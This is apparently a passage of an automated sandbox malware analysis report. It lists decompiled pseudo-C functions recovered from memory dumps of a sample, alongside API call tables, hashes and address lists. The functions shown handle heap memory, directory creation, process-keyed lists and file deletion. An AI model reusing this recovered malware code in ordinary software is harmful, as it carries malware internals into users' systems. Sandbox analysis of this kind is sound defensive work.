                                                                                        • Instruction ID: 7d422b86b70e3d6a554aa168e1991d4193d91c26f292330e331d0cbd560a3e20
                                                                                        • Opcode Fuzzy Hash: 64620bb39f6366a4a7dea67c5747cd77a4a7babb8e767f25d3e85390a57a7497
                                                                                        • Instruction Fuzzy Hash: 1A212876A40219BBDB118FD8EC48BEEBBB8EB48711F0441A5ED04E7310DB319E51DAA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E00D18420(intOrPtr __ecx, signed int __edx, long* _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				void* _t20;
                                                                                        				signed int _t28;
                                                                                        				signed int _t36;
                                                                                        				long _t44;
                                                                                        				void* _t45;
                                                                                        
                                                                                        				_t36 = __edx;
                                                                                        				_t26 = _a4;
                                                                                        				_v8 = __ecx;
                                                                                        				_t28 = __edx * 0x6e;
                                                                                        				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
                                                                                        				 *_a4 = _t44;
                                                                                        				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
                                                                                        				_t45 = _t20;
                                                                                        				if(_t45 == 0) {
                                                                                        					return _t20;
                                                                                        				} else {
                                                                                        					_push(_t28);
                                                                                        					if(E00D129B0(_t45, _t26, _v8, _t36) == 0) {
                                                                                        						return _t45;
                                                                                        					}
                                                                                        					HeapFree(GetProcessHeap(), 0, _t45);
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}









                                                                                        0x00d18429
                                                                                        0x00d1842b
                                                                                        0x00d18433
                                                                                        0x00d18438
                                                                                        0x00d18460
                                                                                        0x00d18466
                                                                                        0x00d1846f
                                                                                        0x00d18475
                                                                                        0x00d18479
                                                                                        0x00d184b1
                                                                                        0x00d1847b
                                                                                        0x00d1847b
                                                                                        0x00d1848e
                                                                                        0x00000000
                                                                                        0x00d184a9
                                                                                        0x00d1849a
                                                                                        0x00d184a8
                                                                                        0x00d184a8

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00D18468
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00D1846F
                                                                                          • Part of subcall function 00D129B0: memset.NTDLL ref: 00D129C4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00D18493
                                                                                        • HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00D1849A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFreememset
                                                                                        • String ID:
                                                                                        • API String ID: 1319286391-0
                                                                                        • Opcode ID: a75f5e210ddb3174151a9bd923e171928c1f76660ad55eaaf1a5acd2aceb93bb
                                                                                        • Instruction ID: 30833fc94ac4e599cab54a636900abd7eb78e7763ff72ab30e6a77c6e1657dca
                                                                                        • Opcode Fuzzy Hash: a75f5e210ddb3174151a9bd923e171928c1f76660ad55eaaf1a5acd2aceb93bb
                                                                                        • Instruction Fuzzy Hash: 42012633F402207BD7249BA9AC09A9EBB69DBC8661F058271FD0CD7384EE21CC1182F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D118D0() {
                                                                                        				short _v524;
                                                                                        				signed int _t14;
                                                                                        				signed char _t16;
                                                                                        				void* _t21;
                                                                                        				void* _t22;
                                                                                        
                                                                                        				memset( &_v524, 0, 0x208);
                                                                                        				if( *0xd1c7c0 == 0) {
                                                                                        					L9:
                                                                                        					return 1;
                                                                                        				} else {
                                                                                        					_t21 = 0;
                                                                                        					do {
                                                                                        						_t2 = _t21 + 0xd1c7c0; // 0x0
                                                                                        						_t14 =  *_t2 & 0x0000ffff;
                                                                                        						_t21 = _t21 + 2;
                                                                                        						 *(_t22 + _t21 - 0x20a) = _t14;
                                                                                        						if(_t14 != 0x5c) {
                                                                                        							goto L8;
                                                                                        						} else {
                                                                                        							_t16 = GetFileAttributesW( &_v524);
                                                                                        							if(_t16 != 0xffffffff) {
                                                                                        								if((_t16 & 0x00000010) == 0) {
                                                                                        									goto L6;
                                                                                        								} else {
                                                                                        									goto L8;
                                                                                        								}
                                                                                        							} else {
                                                                                        								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
                                                                                        									goto L8;
                                                                                        								} else {
                                                                                        									L6:
                                                                                        									return 0;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L10;
                                                                                        						L8:
                                                                                        					} while ( *(_t21 + 0xd1c7c0) != 0);
                                                                                        					goto L9;
                                                                                        				}
                                                                                        				L10:
                                                                                        			}








                                                                                        0x00d118e8
                                                                                        0x00d118f9
                                                                                        0x00d1195e
                                                                                        0x00d11967
                                                                                        0x00d118fb
                                                                                        0x00d118fb
                                                                                        0x00d11900
                                                                                        0x00d11900
                                                                                        0x00d11900
                                                                                        0x00d11907
                                                                                        0x00d1190a
                                                                                        0x00d11915
                                                                                        0x00000000
                                                                                        0x00d11917
                                                                                        0x00d1191e
                                                                                        0x00d11927
                                                                                        0x00d11952
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d11929
                                                                                        0x00d1193a
                                                                                        0x00000000
                                                                                        0x00d11949
                                                                                        0x00d11949
                                                                                        0x00d1194f
                                                                                        0x00d1194f
                                                                                        0x00d1193a
                                                                                        0x00d11927
                                                                                        0x00000000
                                                                                        0x00d11954
                                                                                        0x00d11954
                                                                                        0x00000000
                                                                                        0x00d11900
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesCreateDirectoryErrorFileLastmemset
                                                                                        • String ID:
                                                                                        • API String ID: 528582180-0
                                                                                        • Opcode ID: 092f171ddc4db44287d06b782f3f02dc612bf8b9ffba96a97c99300801d3874e
                                                                                        • Instruction ID: ba2584f0c4dbdcb331b4a633c78a1681ba91ccb1d9715699e423220fd00681cf
                                                                                        • Opcode Fuzzy Hash: 092f171ddc4db44287d06b782f3f02dc612bf8b9ffba96a97c99300801d3874e
                                                                                        • Instruction Fuzzy Hash: 2501D23599031676DBA09B64BC0C7E6736CEB00714F041656EA78E21D1EF71A8C5CAE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D18B30(WCHAR* _a4, intOrPtr* _a8) {
                                                                                        				intOrPtr* _t14;
                                                                                        				intOrPtr* _t19;
                                                                                        				intOrPtr _t24;
                                                                                        				WCHAR* _t25;
                                                                                        				intOrPtr* _t26;
                                                                                        
                                                                                        				_t25 = _a4;
                                                                                        				_t10 = _t25 + 0x24;
                                                                                        				_a4 = _t25 + 0x24;
                                                                                        				_t24 = E00D119E0(_t10);
                                                                                        				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
                                                                                        					L8:
                                                                                        					return 1;
                                                                                        				}
                                                                                        				_t19 = _a8;
                                                                                        				_t14 =  *_t19;
                                                                                        				if(_t14 == 0) {
                                                                                        					L5:
                                                                                        					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
                                                                                        					if(_t26 != 0) {
                                                                                        						_t8 = _t26 + 4; // 0x4
                                                                                        						lstrcpyW(_t8, _a4);
                                                                                        						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
                                                                                        						 *_t26 =  *_t19;
                                                                                        						 *_t19 = _t26;
                                                                                        					}
                                                                                        					L7:
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
                                                                                        					_t14 =  *_t14;
                                                                                        					if(_t14 != 0) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					goto L5;
                                                                                        				}
                                                                                        				goto L7;
                                                                                        			}








                                                                                        0x00d18b34
                                                                                        0x00d18b38
                                                                                        0x00d18b3d
                                                                                        0x00d18b45
                                                                                        0x00d18b50
                                                                                        0x00d18ba3
                                                                                        0x00d18baa
                                                                                        0x00d18baa
                                                                                        0x00d18b53
                                                                                        0x00d18b56
                                                                                        0x00d18b5a
                                                                                        0x00d18b6e
                                                                                        0x00d18b82
                                                                                        0x00d18b86
                                                                                        0x00d18b8b
                                                                                        0x00d18b8f
                                                                                        0x00d18b95
                                                                                        0x00d18b9d
                                                                                        0x00d18b9f
                                                                                        0x00d18b9f
                                                                                        0x00d18ba1
                                                                                        0x00000000
                                                                                        0x00d18ba1
                                                                                        0x00d18b60
                                                                                        0x00d18b68
                                                                                        0x00d18b6c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d18b6c
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32(00000000,00000000,?,00D1215D,0000022C,00000000,?,?), ref: 00D18B47
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00D1215D,0000022C,00000000,?,?), ref: 00D18B75
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00D1215D), ref: 00D18B7C
                                                                                        • lstrcpyW.KERNEL32(00000004,?), ref: 00D18B8F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HeapProcess$AllocateCurrentlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2952365268-0
                                                                                        • Opcode ID: 95b2074a14b35c9dc19231d2bc43d50d658ba2d6c550fea5dad73bd00a16d283
                                                                                        • Instruction ID: f962db67994926f4818e840bf92956856fd60e456655e3d79dce7252f17def9d
                                                                                        • Opcode Fuzzy Hash: 95b2074a14b35c9dc19231d2bc43d50d658ba2d6c550fea5dad73bd00a16d283
                                                                                        • Instruction Fuzzy Hash: E3016975640314BFCB208F69E888AD6B7E8FB44780B188529F946D7251DE30E880CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D184C0(intOrPtr __ecx, void* __edx, long* _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				void* _t5;
                                                                                        				void* _t11;
                                                                                        				void* _t17;
                                                                                        
                                                                                        				_t16 = _a4;
                                                                                        				_t11 = __edx;
                                                                                        				_v8 = __ecx;
                                                                                        				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
                                                                                        				_t17 = _t5;
                                                                                        				if(_t17 == 0) {
                                                                                        					return _t5;
                                                                                        				} else {
                                                                                        					if(E00D12D80(_t17, _t16, _v8, _t11) == 0) {
                                                                                        						return _t17;
                                                                                        					}
                                                                                        					HeapFree(GetProcessHeap(), 0, _t17);
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}







                                                                                        0x00d184c9
                                                                                        0x00d184cc
                                                                                        0x00d184ce
                                                                                        0x00d184dc
                                                                                        0x00d184e2
                                                                                        0x00d184e6
                                                                                        0x00d1851d
                                                                                        0x00d184e8
                                                                                        0x00d184fa
                                                                                        0x00000000
                                                                                        0x00d18515
                                                                                        0x00d18506
                                                                                        0x00d18514
                                                                                        0x00d18514

                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D18668,?,?,?,00D18668,?), ref: 00D184D5
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D184DC
                                                                                          • Part of subcall function 00D12D80: memset.NTDLL ref: 00D12D94
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D184FF
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D18506
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateFreememset
                                                                                        • String ID:
                                                                                        • API String ID: 1319286391-0
                                                                                        • Opcode ID: e0fbb5e20862b1c3262b0c8712e1f2624d3ff4918206c1a53d218babb9f1131e
                                                                                        • Instruction ID: c38a3cf4e031a80bf7116a227f849bad4d709aee8d4af7330a16056afc27f10b
                                                                                        • Opcode Fuzzy Hash: e0fbb5e20862b1c3262b0c8712e1f2624d3ff4918206c1a53d218babb9f1131e
                                                                                        • Instruction Fuzzy Hash: ECF06272B803147BEA1057A9BC096DABB5DDB44667F044062FD08D2311ED219D5146F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00D1A750(long __ecx) {
                                                                                        				int _t3;
                                                                                        				long _t7;
                                                                                        				void* _t9;
                                                                                        				void* _t10;
                                                                                        
                                                                                        				_t10 =  *0xd1cbd4; // 0x0
                                                                                        				_t7 = __ecx;
                                                                                        				_t9 = 0xd1cbd4;
                                                                                        				while(_t10 != 0) {
                                                                                        					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
                                                                                        					if(_t3 == 0x102) {
                                                                                        						_t9 = _t10;
                                                                                        					} else {
                                                                                        						 *_t9 =  *_t10;
                                                                                        						CloseHandle( *(_t10 + 8));
                                                                                        						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
                                                                                        					}
                                                                                        					_t10 =  *_t9;
                                                                                        				}
                                                                                        				return _t3;
                                                                                        			}







                                                                                        0x00d1a752
                                                                                        0x00d1a758
                                                                                        0x00d1a75b
                                                                                        0x00d1a762
                                                                                        0x00d1a768
                                                                                        0x00d1a773
                                                                                        0x00d1a794
                                                                                        0x00d1a775
                                                                                        0x00d1a777
                                                                                        0x00d1a77c
                                                                                        0x00d1a78c
                                                                                        0x00d1a78c
                                                                                        0x00d1a796
                                                                                        0x00d1a798
                                                                                        0x00d1a79f

                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,?,00000000,00D19315,00000000,00D1928E), ref: 00D1A768
                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00D19315,00000000,00D1928E), ref: 00D1A77C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00D19315,00000000,00D1928E), ref: 00D1A785
                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00D19315,00000000,00D1928E), ref: 00D1A78C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$CloseFreeHandleObjectProcessSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1931067520-0
                                                                                        • Opcode ID: 4d7f8faabac547208101a57eddf9d655267f1e628c6f03fdc637d79bbd6d385a
                                                                                        • Instruction ID: 86aa4db4b84ba1475a0967c88a7bcdd0185cfe3f33dc065f4f00824b75fbf025
                                                                                        • Opcode Fuzzy Hash: 4d7f8faabac547208101a57eddf9d655267f1e628c6f03fdc637d79bbd6d385a
                                                                                        • Instruction Fuzzy Hash: 68F08232591320BFE7211B58ED489E67779EB447217184415F945D3361CB709CC1CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 75%
                                                                                        			E00D11970() {
                                                                                        				void* _v8;
                                                                                        				short _v528;
                                                                                        				void* _t15;
                                                                                        
                                                                                        				E00D11830(0xd11010, 0x14, 0x41ce18c7,  &_v8);
                                                                                        				_t15 = _v8;
                                                                                        				 *0xd1c200( &_v528, 0x104, _t15, 0xd1c7c0, _t15);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t15);
                                                                                        				return DeleteFileW( &_v528);
                                                                                        			}






                                                                                        0x00d1198d
                                                                                        0x00d11992
                                                                                        0x00d119a8
                                                                                        0x00d119bb
                                                                                        0x00d119d2

                                                                                        APIs
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • _snwprintf.NTDLL ref: 00D119A8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19730), ref: 00D119B4
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D119BB
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00D119C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
                                                                                        • String ID:
                                                                                        • API String ID: 135842935-0
                                                                                        • Opcode ID: 56426ff8a1ea00808b63a5321ea99af5691df3fb8a6c8dda073c41c2b5a457ab
                                                                                        • Instruction ID: 463b659277475d503aebe0cfe4e50f4584410246d6e36e60ae50e06c26d0e72d
                                                                                        • Opcode Fuzzy Hash: 56426ff8a1ea00808b63a5321ea99af5691df3fb8a6c8dda073c41c2b5a457ab
                                                                                        • Instruction Fuzzy Hash: E5F0A7B1991318BBDB10ABA4AC0DFCB7B6CDB05315F004091BA09E2243DE749A95CBF1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%